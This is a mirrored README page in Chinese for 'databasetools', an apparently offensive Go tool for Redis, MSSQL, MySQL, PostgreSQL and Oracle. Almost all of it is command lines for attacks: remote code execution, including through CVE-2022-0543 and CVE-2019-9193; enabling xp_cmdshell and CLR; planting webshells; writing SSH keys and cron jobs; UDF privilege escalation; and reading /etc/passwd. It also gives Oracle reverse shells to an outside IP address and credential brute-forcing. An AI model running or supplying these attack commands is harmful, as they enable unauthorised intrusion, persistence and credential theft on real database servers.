Code Monkey home page Code Monkey logo

databasetools's Introduction

Redis

连接redis获取sql shell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli

image.png

主从复制RCE

//Linux
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -so exp.so
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -console -so exp.so

image.png

Lua沙盒绕过命令执行(CVE-2022-0543)

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console

image.png

写公钥

将ssh.txt文件中公钥替换成自己生成的

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey

写Webshell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell

image.png

定时任务

需要修改crontab.txt内容

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab

MSSQL

连接数据库并获取一个sql shell

go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX"  -cli

image.png

开启xp_cmdshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp

image.png

xp_cmdshell获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console

image.png

xp_cmdshell执行单条系统命令

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isxp -docmd -cmd "whoami"

image.png

开启sp_oacreate

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp

image.png

sp_oacreate获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console

image.png

sp_oacreate执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -issp -docmd -cmd "whoami"

image.png

CLR获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console

image.png

CLR执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isclr -docmd -cmd "whoami"

image.png

log备份写getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php'

image.png

差异备份getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php'

image.png

SSH连接

go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX"

image.png

Mysql

连接获取sql shell

go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli

image.png

into out file获取webshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\\aaa.php"

image.png

全局日志getshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -generallog -path C:\\\\phpStudy\\\\WWW\\\\aam.php

image.png

udf提权

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -udf

image.png

postgresql

连接postgre数据库获取sql shell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.162 -rport "5432" -cli

image.png

利用CVE-2019-9193循环执行命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -console

image.png

利用CVE-2019-9193执行单条命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -cmd "pwd"

image.png

单次文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -file "/etc/passwd"

image.png

循环文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -console

image.png

单次文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -file "/etc/passwd"

把hex值转换string即为结果 image.png

循环文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -console

image.png

列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -file "./"

image.png

循环列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -console

image.png

上传webshell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -write -uploadpath "/tmp/shell.jsp" -e "jsp"

image.png

Oracle

使用之前需要安装oracle客户端 Windows下安装方法 解压下载的instantclient_21_8压缩包,将解压路径添加到系统变量path image.png Linux下正常支持Redis、Mysql、SQL Server、Postgresql,如想使用Oracle功能需要安装Oracle客户端驱动。在Kali下所有功能可完美运行

获取sql shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser test -pwd "1qaz@WSX" -sid helowin -cli

image.png

DBMS_Export_Extention循环执行命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -console

image.png

DBMS_Export_Extention执行单条命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -docmd -cmd "whoami"

image.png

DBMS_Export_Extention反弹shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -dee -re

image.png image.png

DBMS_XMLQUERY循环执行系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -console

image.png

DBMS_XMLQUERY执行单条系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -docmd -cmd "whoami"

image.png

卸载命令执行函数

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -del

image.png

dbms_java_test.funcall反弹shell

 go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -fc

image.png image.png

爆破数据库账号密码

Mysql

go run .\main.go -rhost 192.168.111.206 -rport 3306 -crack -m mysql

image.png

MSSQL

go run .\main.go -rhost 192.168.111.223 -rport 1433 -crack -m mssql

image.png

Postgresql

go run .\main.go -rhost 192.168.111.211 -rport 5432 -crack -m postgresql

image.png

Redis

go run .\main.go -rhost 192.168.111.211 -rport 6379 -crack -m redis

image.png

Oracle

go run .\main.go -rhost 192.168.111.211 -rport 1521 -crack -m oracle

image.png

databasetools's People

Contributors

hel10-web avatar

Stargazers

avatar avatar avatar

Forkers

xiju2003 uuusmile

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.